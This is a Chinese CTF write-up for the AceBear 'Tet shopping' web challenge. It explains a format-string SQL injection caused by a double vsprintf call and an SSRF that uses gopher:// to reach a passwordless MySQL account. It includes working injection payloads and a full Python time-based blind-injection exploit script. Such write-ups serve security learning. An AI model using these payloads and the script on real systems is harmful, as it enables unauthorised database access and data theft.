Chybeta

AceBear Security Contest-Tet shopping-writeup

本文首发于:阿里先知安全社区:AceBear Security Contest-Tet shopping-writeup

前言

这几天研究了一下AceBear Security Contest的Tet shopping题目,整体思路以及涉及的知识点如下:

  • 格式化字符串sql注入漏洞
  • 基于gopher协议的SSRF攻击来完成对mysql未授权访问漏洞的利用
  • 时间盲注

题目


1
2
Website: Link http://128.199.179.156/
Source: source http://128.199.179.156/src.tar.gz

Solution

基本功能

点开链接,发现有一个登陆框,提供了注册和登陆功能。

完成注册和登陆后,发现有购物功能,你可以买Banh chung或者Banh tet,购买完后会出现下图中的红框框起部分:

接下里看源码。源码大体结构如下,img文件夹里存放了图片,backup.sh是脚本文件,里面涉及了mysql操作和flag的保存,具体内容见后。cfg.php文件主要定义了sql操作比如查询等等,db.sql是sql文件,func.php包含有功能比如购买等等,index.php即主页,info.php用来显示每样物品的具体信息,item.php显示购买信息,login.php和logout.php分别是登陆与登出:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
│ backup.sh
│ cfg.php
│ db.sql
│ func.php
│ index.php
│ info.php
│ item.php
│ login.php
│ logout.php
│ ok.jpg
└─img
banh-chung-22.jpg
banh_chung.jpg
banh_tet.jpg

由于初次点开,会直接跳转到login.php进行注册和登陆,因此我们先来看看 login.php,限于篇幅仅示出部分关键代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
<?php
session_start();
include "cfg.php";
if (isLogin())
die(header("Location: index.php"));
$msg = '';
if(isset($_POST['action'])){
switch($_POST['action']){
case 'login':
if (isset($_POST["user"]) && !empty($_POST["user"]) && isset($_POST["passwd"]) && !empty($_POST["passwd"])) {
$prepare_qr = $jdb->addParameter("SELECT uid from users where user=%s and passwd=sha1(%s)", $_POST["user"], $_POST['passwd']);
$result = $jdb->fetch_assoc($prepare_qr);
if(count($result)===1){
$_SESSION["id"] = (int)$result[0]["uid"];
$msg = "Login successful!";
die(header("Location: index.php"));
}else{
$msg = "Invalid information!";
}
}else{
$msg = "Missing detail!";
}
break;
case 'register':
if (isset($_POST["user"]) && !empty($_POST["user"]) && isset($_POST["passwd"]) && !empty($_POST["passwd"])){
$prepare_qr = $jdb->addParameter("SELECT uid from users where user=%s", $_POST['user']);
$result = $jdb->fetch_assoc($prepare_qr);
if(count($result)>0){
$msg = "User exists!";
}else{
$prepare_qr = $jdb->addParameter("INSERT INTO users VALUES (0, %s, sha1(%s))" , $_POST["user"], $_POST["passwd"]);
$result = $jdb->insert_data($prepare_qr);
if($result)
$msg = "Register successful!";
else
$msg = "Register failed!";
}
}else{
$msg = "Missing detail!";
}
break;
}
}
echo $msg;
?>

先看注册register部分。在接受userpasswd后,先执行了下面这两条语句:

1
2
$prepare_qr = $jdb->addParameter("SELECT uid from users where user=%s", $_POST['user']);
$result = $jdb->fetch_assoc($prepare_qr);

$prepare_qr类似php中的预编译语句,然后再通过$jdb->fetch_assoc()获取数据。倘若结果为空/零,则执行插入(即注册)操作,类似的先执行了出题者自己写的“预编译”方法,之后在执行插入:

1
2
$prepare_qr = $jdb->addParameter("INSERT INTO users VALUES (0, %s, sha1(%s))" , $_POST["user"], $_POST["passwd"]);
$result = $jdb->insert_data($prepare_qr);

以上与数据库有交互的操作,均定义在cfg.php 中,Jdb是其中的类,而其构造方法是链接数据库,部分关键源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
<?php
class Jdb{
...
function fetch_assoc($qr){
$qq = mysqli_query($this->conn, $qr);
$return = array();
while($req = mysqli_fetch_assoc($qq)){
array_push($return, $req);
}
return $return;
}
function insert_data($qr){
return mysqli_query($this->conn, $qr);
}
function addParameter($qr, $args){
if(is_null($qr)){
return;
}
if(strpos($qr, '%') === false ) {
return;
}
$a rgs = func_get_args();
array_shift($args);
if(is_array($args[0]) && count($args)==1){
$args = $args[0];
}
foreach($args as $arg){
if(!is_scalar($arg) && !is_null($arg)){
return;
}
}
$qr = str_replace( "'%s'", '%s', $qr);
$qr = str_replace( '"%s"', '%s', $qr);
$qr = preg_replace( '|(?<!%)%f|' , '%F', $qr);
$qr = preg_replace( '|(?<!%)%s|', "'%s'", $qr);
array_walk($args, array( $this, 'ebr' ) );
return @vsprintf($qr, $args);
}
function ebr(&$st ) {
if (!is_float($st))
$st = $this->_re($st);
}
function _re($st) {
if ($this->conn) {
return mysqli_real_escape_string($this->conn, $st);
}
return addslashes($st);
}
}
$jdb = new Jdb();
include "func.php";

从注册的流程可以看到sql语句均经过addParameter后再进一步执行。在addParameter中,可以看到参数先经过了mysqli_real_escape_string,之后再通过vsprintf写入sql语句,这让人想起经典的wordpress 格式化字符串sql注入漏洞,文章中提到了利用条件:

我们在第一次格式化字符串操作中写入格式化字符串如%s,然后要在第二次格式化字符串操作中完成对第一步写入的格式化字符串的控制。单单就login.php中的操作而言,由于注册/登陆都仅仅涉及了一次addParameter,也即只涉及一次的vsprintf,因此此处的利用难以成功。

格式化字符串sql注入漏洞

通过进一步的审计,在info.php发现了一处连续两次调用addParameter的代码:

1
2
3
$prepare_qr = $jdb->addParameter("SELECT goods.name, goods.description, goods.img from goods inner join info on goods.uid=info.gid where gid=%s", $_GET['uid']);
$prepare_qr = $jdb->addParameter($prepare_qr.' and user=%s', $username);
$result = $jdb->fetch_assoc($prepare_qr);

在第一个addParameter$_GET['uid']完全可控,第二个addParameter中,$username是通过SESSION来查询数据库找出对应的用户名,这个用户名即注册时的用户名,也就是也完全可控。测试代码:

1
2
3
4
5
6
7
8
9
10
<?php
include 'cfg.php';
$username=$_GET['username'];
$prepare_qr = $jdb->addParameter("SELECT goods.name, goods.description, goods.img from goods inner join info on goods.uid=info.gid where gid=%s", $_GET['uid']);
print_r("First:<br>");
print_r($prepare_qr.'<br>');
$prepare_qr = $jdb->addParameter($prepare_qr.' and user=%s', $username);
print_r("Second:<br>");
print_r($prepare_qr);

第一种payload:

1
http://127.0.0.1:2500/AceBear/tetshopping/index3.php?uid=%1$' or 1=1%23&username=chybeta

更具体的原因可以参见:LCTF 2017-Simple blog-writeup

第二种payload:

1
http://127.0.0.1:2500/AceBear/tetshopping/index3.php?uid=%1$c or 1=1%23&username=39

这是因为在第二次的格式化字符串vsprintf中,%1$c相当于选择第一个参数,而%c会将其转化为对应的ascii字符。这里的第一个参数$username39,转化后变为',从而逃逸。

接下里寻找目标,在backup.sh中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#!/bin/sh
echo "[+] Creating flag user and flag table."
mysql -h 127.0.0.1 -uroot -p <<'SQL'
CREATE DATABASE IF NOT EXISTS `flag` /*!40100 DEFAULT CHARACTER SET utf8 */;
USE `flag`;
DROP TABLE IF EXISTS `flag`;
CREATE TABLE `flag` (
`flag` VARCHAR(1000)
);
CREATE USER 'fl4g_m4n4g3r'@'localhost';
GRANT USAGE ON *.* TO 'fl4g_m4n4g3r'@'localhost';
GRANT SELECT ON `flag`.* TO 'fl4g_m4n4g3r'@'localhost';
SQL
echo -n "[+] Please input the flag:"
read flag
mysql -h 127.0.0.1 -uroot -p <<SQL
INSERT INTO flag.flag VALUES ('$flag');
SQL
echo "[+] backup successful"

flag存放在数据库flagflag表的flag字段中,其用户为fl4g_m4n4g3r,暂时我们没有权限访问。并且我们可以注意到,数据库用户fl4g_m4n4g3r并没有设置密码,这就可能存在未授权访问漏洞。

SSRF

在info.php的最后一行,执行了watermark_me($result[0]['img'])$result[0]['img']是基于前面sql查询语句查询结果,由前sql注入分析知这个参数是我们可以控制的。watermark_me()定义在func.php中,相关代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
function get_data($url) {
$ch = curl_init();
$timeout = 2;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function watermark_me($img){
if(preg_match('/^file/', $img)){
die("Ahihi");
}
$file_content = get_data($img);
$fname = 'tmp-img-'.rand(0,9).'.tmp';
file_put_contents('/tmp/'.$fname, $file_content);
while(1){
if(file_exists('/tmp/'.$fname))
break;
}
$stamp = imagecreatefromjpeg('ok.jpg');
$imgPng = imagecreatefromjpeg('/tmp/'.$fname);
$marge_right = 10;
$marge_bottom = 10;
$sx = imagesx($stamp);
$sy = imagesy($stamp);
imagecopy($imgPng, $stamp, imagesx($imgPng) - $sx - $marge_right, imagesy($imgPng) - $sy - $marge_bottom, 0, 0, imagesx($stamp), imagesy($stamp));
if($imgPng){
@unlink('/tmp/'.$fname);
//header("Content-type: image/png");
ob_start();
imagePng($imgPng);
$imagedata = base64_encode(ob_get_contents());
ob_end_clean();
@imagedestroy($imgPng);
return $imagedata;
}else{
@unlink('/tmp/'.$fname);
die("Ahihi");
}
}

先检查$img是否已file开头,若不是则调用get_data(),之后创建文件并返回。而get_data()里是curl操作,很容易联想到SSRF攻击。结合前面的sql漏洞,以及对应的backup.sh,可以想到这篇SSRF To RCE in MySQL 中提到的技巧。

通过sql注入漏洞,我们可以控制$result[0]['img']gopher://127.0.0.1:3306/_ + payload ,即可在get_data()中利用curl和gopher协议对mysql进行未授权访问,payload中填上我们要执行的sql语句,包括登陆,查询,以及退出。由于这个方法返回的是二进制数据,而不是普通的数据,因此无法根据返回页面的内容来进行布尔注入。本地测试如下:

但由于可以执行sql语句,因此我们可以进行基于时间的盲注。

首先用wrieshark抓包,获取到登陆以及对应执行的raw数据:

由于是未授权访问,因此raw数据的认证部分其实是相同的,可以不用修改。而要执行的sql语句需要根据情况来变化,在wireshark中找到对应的位置:

以上图为例,选取的部分是sql语句,之前有一个固定字段00000003,再之前的13是sql语句的长度加一后的十六进制值,这里sql语句长度为18,加一为19,也即19=1 * 16 + 3 即 hex(19) = 13。这样我们能生成攻击的gopher协议的payload了。

接着考虑如何与前面的sql格式化字符串结合起来,如图所示,利用单引号逃逸和union select控制了第三个字段值:

为演示和防止编码问题,将gopher://127.0.0.1:3306/_%b6编码为十六进制0x676f706865723a2f2f3132372e302e302e313a333330362f5f256236,mysql在接受后会自动的解码还原,%在此过程中不会丢失,这样在之后的curl操作中得以进行。

最终利用脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import binascii
import requests
def str_hex(data):
return str(hex(data)).replace('0x','')
def encode(query):
enc_query = ''
for i in query:
enc_query += str_hex(ord(i))
return enc_query
def gen_payload(query):
payload = 'b600000185a23f0000000001210000000000000000000000000000000000000000000000666c34675f6d346e3467337200006d7973716c5f6e61746976655f70617373776f72640071035f6f731064656269616e2d6c696e75782d676e750c5f636c69656e745f6e616d65086c69626d7973716c045f70696404323833360f5f636c69656e745f76657273696f6e0731302e312e3233095f706c6174666f726d067838365f36340c70726f6772616d5f6e616d65056d7973716c'
payload += '210000000373656c65637420404076657273696f6e5f636f6d6d656e74206c696d69742031'
payload += str_hex(len(query)+1)
payload += '00000003'
payload += encode(query)
payload += '0100000001'
return payload
def result(payload):
result = [payload[i:i+2] for i in range(0,len(payload),2)]
return binascii.b2a_hex(b"gopher://127.0.0.1:3306/_%"+"%".join(result))
def exp():
i = 1
flag = ""
url = "http://128.199.179.156/info.php"
cookie = {
'PHPSESSID':'av7963h17c1qukv4jm4gklvoi1'
}
while True:
for j in range(127,32,-1):
print 'j:'+str(j)
query = "select * from flag.flag where IF(ascii(substr((select * from flag.flag),%s,1)) =%s,sleep(5),1);" % (str(i),str(j))
uid = "?uid=%1$'%20union%20select%201,1,0x" + result(gen_payload(query)) + "%23"
fullurl = url + uid
try:
r = requests.get(fullurl,cookies=cookie,timeout=5)
except Exception as e:
flag += chr(j)
print(flag)
i = i+1
break
print(flag)
if __name__ == '__main__':
exp()

访问:https://tinyurl.com/y9pplum3

flag:

1
AceBear{Just_WP_SQLi_and_some_SSRF_tricks}

参考

点击赞赏二维码,您的支持将鼓励我继续创作!
chybeta WeChat Pay

微信打赏

chybeta Alipay

支付宝打赏

本文标题:AceBear Security Contest-Tet shopping-writeup

文章作者:chybeta

发布时间:2018年01月31日 - 10:01

最后更新:2018年02月03日 - 19:02

原始链接:http://chybeta.github.io/2018/01/31/AceBear-Security-Contest-Tet-shopping-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。